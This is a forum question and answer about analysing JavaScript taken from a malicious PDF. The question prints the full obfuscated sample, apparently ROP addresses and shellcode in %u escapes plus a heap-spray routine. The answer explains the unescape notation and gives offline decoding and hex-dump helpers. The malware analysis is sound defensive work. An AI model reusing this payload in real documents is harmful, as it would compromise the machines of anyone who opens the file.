Extract JavaScript from a malicious PDF
Question
I have a PDF file that I know for a fact contains JavaScript that does something malicious, though I'm not sure what at this point.
I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but the code itself is kind of hidden in a syntax I haven't seen before.
Code example: this is what the majority of the code looks like:
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
I imagine this notation, with its long variable/function names and escaped text, is meant to confuse scanners that look for these kinds of things.
Two questions:
Question 1
Can someone tell me what this %u4141 notation is called?
Question 2
Is there a tool that will translate that notation into plaintext so I can see what it is doing?
Full JS code:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
Recommended answer
Those could be memory addresses, OS calls, heap-spray data, anything.
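On the heap-spraying possibility: the tail of the posted script (the doubling loops and the array of 0x1f0 copies) has the shape usually associated with a heap spray. As a rough sketch, the length arithmetic can be replayed on plain numbers, without building any strings or touching the payload. The function name sprayLayout and the 2-bytes-per-character figure are assumptions made for illustration; how a real engine stores strings may differ.

```javascript
// Sketch only: replays the *length arithmetic* of the posted script on numbers.
// sprayLayout is a hypothetical name; nothing from the sample is executed.
function sprayLayout() {
  // C starts as two code units (0x0c0c, 0x0c0c) and doubles in the loop.
  let cLen = 2;
  while (cLen + 20 + 8 < 65536) cLen += cLen;

  // D = C.substring(0, (0x0c0c-0x24)/2) + B + C
  // so B begins after this many filler code units.
  const payloadOffsetUnits = (0x0c0c - 0x24) / 2;

  // E = D.substring(0, 65536/2), then doubled until it reaches 0x80000 units.
  let eLen = 65536 / 2;
  while (eLen < 0x80000) eLen += eLen;

  // F = E.substring(0, 0x80000 - (0x1020-0x08)/2)
  const fLen = 0x80000 - (0x1020 - 0x08) / 2;

  // G holds 0x1f0 strings, each F + "s".
  const copies = 0x1f0;

  // Assumption: 2 bytes per code unit (UTF-16 storage).
  const bytesPerCopy = (fLen + 1) * 2;

  return {
    cLen,
    payloadOffsetUnits,
    payloadOffsetBytes: payloadOffsetUnits * 2,
    eLen,
    fLen,
    copies,
    bytesPerCopy,
    totalBytes: bytesPerCopy * copies,
  };
}

console.log(sprayLayout());
```

Under those assumptions, each copy is about 1 MB, the array holds 496 of them, and B starts 0x0c0c - 0x24 bytes into a pattern that repeats every 64 KB. That is consistent with a spray, but it does not by itself say what B does.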
The clue is that the function being called is unescape. To get the actual values, you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.
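For context, each %uXXXX is a 16-bit code unit written as four hex digits, which is the form the legacy escape/unescape functions use for characters outside Latin-1. If you would rather not paste the sample into a website, a small offline decoder is enough. The following is a minimal sketch, not a vetted tool: the function names are made up for illustration, and emitting the low byte first assumes the little-endian layout the string would have in memory on x86.

```javascript
// Hypothetical helpers: decode %uXXXX / %XX escapes by hand, so that
// nothing from the suspicious script is ever evaluated.
function decodeToCodeUnits(escaped) {
  const units = [];
  // Try %uXXXX first, then %XX, then fall back to one literal character.
  const pattern = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    if (match[1] !== undefined) {
      units.push(parseInt(match[1], 16));
    } else if (match[2] !== undefined) {
      units.push(parseInt(match[2], 16));
    } else {
      units.push(match[3].charCodeAt(0));
    }
  }
  return units;
}

// Assumption: each 16-bit unit is stored low byte first (little-endian).
function toLittleEndianBytes(units) {
  const bytes = new Uint8Array(units.length * 2);
  units.forEach((unit, i) => {
    bytes[2 * i] = unit & 0xff;
    bytes[2 * i + 1] = unit >> 8;
  });
  return bytes;
}

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
}

// First four escapes from the posted sample.
const sample = "%u4141%u4141%u63a5%u4a80";
console.log(toHex(toLittleEndianBytes(decodeToCodeUnits(sample))));
// prints "41 41 41 41 a5 63 80 4a"
```

Read as 32-bit little-endian values, those eight bytes are 0x41414141 followed by 0x4a8063a5, which is why the data looks more like a list of addresses than like text.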
The result will likely look like garbage as ASCII, but you can try loading it into a hex editor to see if you can make more sense of it. If a virus scanner can identify what the file is infected with, you may be able to research that particular malware and figure out what the code is doing.
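If no hex editor is at hand, a hex-editor-style view of the decoded bytes can be printed directly. This is a rough sketch; hexDump is a hypothetical helper, and the eight input bytes are the little-endian form of the first four %u escapes in the sample.

```javascript
// Hypothetical helper: format bytes as offset, hex column, and ASCII column.
function hexDump(bytes, width = 16) {
  const lines = [];
  for (let offset = 0; offset < bytes.length; offset += width) {
    const row = Array.from(bytes.slice(offset, offset + width));
    const hex = row.map((b) => b.toString(16).padStart(2, "0")).join(" ");
    // Non-printable bytes are shown as '.', as most hex editors do.
    const ascii = row
      .map((b) => (b >= 0x20 && b < 0x7f ? String.fromCharCode(b) : "."))
      .join("");
    lines.push(
      offset.toString(16).padStart(8, "0") +
        "  " +
        hex.padEnd(width * 3 - 1) +
        "  " +
        ascii
    );
  }
  return lines.join("\n");
}

// Bytes for %u4141%u4141%u63a5%u4a80, low byte of each unit first.
const firstBytes = Uint8Array.from([0x41, 0x41, 0x41, 0x41, 0xa5, 0x63, 0x80, 0x4a]);
console.log(hexDump(firstBytes, 8));
// prints "00000000  41 41 41 41 a5 63 80 4a  AAAA.c.J"
```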
In the interest of science, fire up a Windows VM, run it, and see what it does :)